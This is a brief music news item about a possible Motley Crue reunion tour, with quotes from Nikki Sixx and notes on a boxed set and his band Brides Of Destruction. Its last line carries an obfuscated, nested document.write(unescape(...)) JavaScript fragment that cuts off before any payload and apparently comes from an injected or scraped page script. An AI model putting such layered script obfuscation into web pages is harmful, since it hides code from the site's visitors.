The original members of Motley Crue look as if they may get together for one last blast from the past tour.
Since the release of "The Dirt," based on the notoriously hard-partying band's 2001 autobiography they have found a new lease of live and an ever increasing fan base.
Bassist Nikki Sixx commented "I speak to [drummer] Tommy [Lee], [guitarist] Mick [Mars] and [vocalist] Vince [Neil] quite often, but I know Vince has some resentments that need to be ironed out," he admitted.
"But if everybody wants to do a Crue tour, I'm there," he continued. "At this point for me, a Motley Crue tour is not about the money. I'd really like to go out and give one last kick arse tour where everybody including the band walk away with a smile on their face."
This month, the four-CD Crue boxed set "Music to Crash Your Car To, Vol. 1," featuring every track from the band's first four albums is released. Sixx has also signed a deal with Sanctuary for the March release of the debut album from his new band, Brides Of Destruction, which includes former L.A. Guns guitarist Tracii Guns, drummer Scot Coogan and vocalist London LeGrand.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22